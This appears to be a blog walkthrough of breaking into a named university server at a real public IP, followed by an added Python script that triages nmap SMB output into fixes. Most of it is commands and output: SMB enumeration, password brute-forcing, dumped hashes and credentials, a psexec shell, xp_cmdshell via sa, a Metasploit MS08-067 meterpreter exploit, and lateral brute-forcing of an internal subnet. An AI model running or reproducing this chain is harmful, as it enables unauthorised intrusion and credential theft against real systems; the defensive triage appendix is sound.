Guangxi Normal University website http://202.103.242.241/

root@bt:~# nmap -sS -sV 202.103.242.241

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00048s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE      VERSION
135/tcp  open  mstask       Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds Microsoft Windows 2000 microsoft-ds
1025/tcp open  mstask       Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open  msrpc        Microsoft Windows RPC
3372/tcp open  msdtc?
3389/tcp open  ms-term-serv?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
SF:(GetRequest,6,"hO\n\x000Z")%r(RTSPRequest,6,"hO\n\x000Z")%r(HTTPOptions
SF:,6,"hO\n\x000Z")%r(Help,6,"hO\n\x000Z")%r(SSLSessionReq,6,"hO\n\x000Z")
SF:%r(FourOhFourRequest,6,"hO\n\x000Z")%r(LPDString,6,"hO\n\x000Z")%r(SIPO
SF:ptions,6,"hO\n\x000Z");
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb    // list the SMB scan scripts
-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
-rw-r--r-- 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse
-rw-r--r-- 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse
-rw-r--r-- 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse
-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
-rw-r--r-- 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse
-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
-rw-r--r-- 1 root root  1658 2011-07-09 07:36 smb-flood.nse
-rw-r--r-- 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse
-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
-rw-r--r-- 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
-rw-r--r-- 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse
-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
-rw-r--r-- 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 202.103.242.241
// use the script to enumerate the account names that exist on the remote machine

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-users:
|_  Domain: PG-F289F9A8EF3E; Users: Administrator, Guest, test, TsInternetUser    // scan result

Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-shares.nse 202.103.242.241
// view the shares

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00035s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ

Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse 202.103.242.241
// obtain user passwords

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00041s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful

Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds

root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2    // grab the hashes
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
root@bt:~# nmap --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.0012s latency).
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-pwdump:
|   Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
|   Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
|   test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_  TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2

Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds

C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test -p 123456 -e cmd.exe    // get a cmd shell

PsExec v1.55 - Execute processes remotely
Copyright (C) 2001-2004 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig

Windows 2000 IP Configuration

Ethernet adapter 本地连接:

        Connection-specific DNS Suffix . :
        IP Address. . . . . . . . . . . . : 202.103.242.241
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 202.103.1.1

C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P "123456" -Q "exec master..xp_cmdshell 'net user'"    // log in remotely as sa and execute a command

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-check-vulns.nse 202.103.242.241    // check the target machine for vulnerabilities

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00046s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-check-vulns:
|_  MS08-067: VULNERABLE

Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds

root@bt:~# msfconsole    // exploit the MS08-067 vulnerability against the target machine from msf
msf > search ms08
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options
msf exploit(ms08_067_netapi) > set RHOST 202.103.242.241
msf exploit(ms08_067_netapi) > show payloads
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > exploit
meterpreter >
Background session 2? [y/N]  (ctrl+z)
msf exploit(ms08_067_netapi) > sessions -l

root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
test
administrator
root@bt:/usr/local/share/nmap/scripts# vim password.txt
44EFCE164AB921CAAAD3B435B51404EE
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse --script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
// try to log in across the whole internal subnet with the usernames and the captured hash

Nmap scan report for 192.168.1.105
Host is up (0.00088s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|_  administrator:<blank> => Login was successful

The attack succeeded: a simple msf + nmap attack.
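The host-script results above (smb-enum-shares, smb-brute, smb-pwdump, smb-check-vulns) are exactly the conditions a defender needs to find and fix before someone else does. The following Python is an added example, not code from the original post and not part of nmap: it parses the plain-text "Host script results:" block in the layout Nmap 5.59 printed on this page and ranks the weaknesses it reports. The function names (split_host_scripts, triage) and the severity scale are my own; the sample output is constructed from the page's results, with a documentation-range address in place of the real host.

```python
"""Triage nmap SMB NSE host-script output into a prioritised finding list.
Added example (not from the original post or from nmap): it parses the plain-text
"Host script results:" block and flags the conditions the walkthrough relied on."""
from __future__ import annotations
import re
from dataclasses import dataclass

SEVERITY_ORDER = {"critical": 0, "high": 1, "medium": 2}

@dataclass
class Finding:
    severity: str
    script: str
    detail: str

def split_host_scripts(nmap_text: str) -> dict[str, list[str]]:
    """Return {script_name: [result lines]}. nmap prints '| name:' per script, then
    its lines prefixed '|' or '|_' (last line); any unprefixed line ends the block."""
    scripts: dict[str, list[str]] = {}
    current, in_block = None, False
    for raw in nmap_text.splitlines():
        line = raw.rstrip()
        if line.startswith("Host script results:"):
            in_block = True
        elif in_block and line.startswith("|"):
            body = line.lstrip("|_ ")                 # drop tree prefix and indentation
            header = re.fullmatch(r"([\w-]+):", body)
            if header:
                current = header.group(1)
                scripts[current] = []
            elif current is not None and body:
                scripts[current].append(body)
        else:
            current, in_block = None, False           # "Nmap done:" or the next host
    return scripts

def triage(scripts: dict[str, list[str]]) -> list[Finding]:
    """Map per-script result lines onto findings, most severe first."""
    findings: list[Finding] = []
    share = None
    for item in scripts.get("smb-enum-shares", []):   # share name, then its access line
        if ":" not in item:
            share = item
        elif item.startswith("Anonymous access:"):
            level = item.split(":", 1)[1].strip()
            if level != "<none>":
                # anonymous IPC$ allows null-session enumeration; a data share leaks files
                sev = "medium" if share == "IPC$" else "high"
                findings.append(Finding(sev, "smb-enum-shares", f"{share} allows anonymous {level}"))
    for item in scripts.get("smb-brute", []):         # any guessed password is weak
        m = re.match(r"(\S+?):(\S*) => Login was successful", item)
        if m:
            user, password = m.groups()
            sev = "critical" if password == "<blank>" or user.lower() == "administrator" else "high"
            findings.append(Finding(sev, "smb-brute", f"{user} authenticates with password {password}"))
    for item in scripts.get("smb-pwdump", []):        # 'NO PASSWORD' is the empty-password hash
        m = re.match(r"(\S+):(\d+) => (.*)", item)
        if m and "NO PASSWORD" in m.group(3):
            findings.append(Finding("critical", "smb-pwdump",
                                    f"{m.group(1)} (RID {m.group(2)}) has an empty password"))
    for item in scripts.get("smb-check-vulns", []):   # each line is '<check>: <status>'
        m = re.match(r"(\S+): (VULNERABLE.*)", item)
        if m:
            findings.append(Finding("critical", "smb-check-vulns",
                                    f"{m.group(1)} {m.group(2)}: apply the vendor patch"))
    findings.sort(key=lambda f: SEVERITY_ORDER[f.severity])   # stable sort keeps script order
    return findings

# Constructed sample: the walkthrough's four script results merged into one run
# (as 'nmap --script "smb-*"' would print them), with a documentation-range address.
SAMPLE_OUTPUT = """\
Nmap scan report for bogon (192.0.2.10)
Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful
| smb-pwdump:
|   Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
|_  Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
| smb-check-vulns:
|_  MS08-067: VULNERABLE
Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds
"""

if __name__ == "__main__":
    for f in triage(split_host_scripts(SAMPLE_OUTPUT)):
        print(f"[{f.severity.upper():8}] {f.script}: {f.detail}")
```

Run against the sample it lists the blank administrator password, the two empty hashes and MS08-067 as critical, the guessable test password as high, and anonymous READ on IPC$ as medium. For the host in this walkthrough every one of those maps to a concrete fix: install the MS08-067 update, set passwords on Administrator and test (and disable Guest and TsInternetUser if unused), set RestrictAnonymous so null sessions cannot enumerate accounts, and remove the weak sa password and xp_cmdshell from the SQL Server.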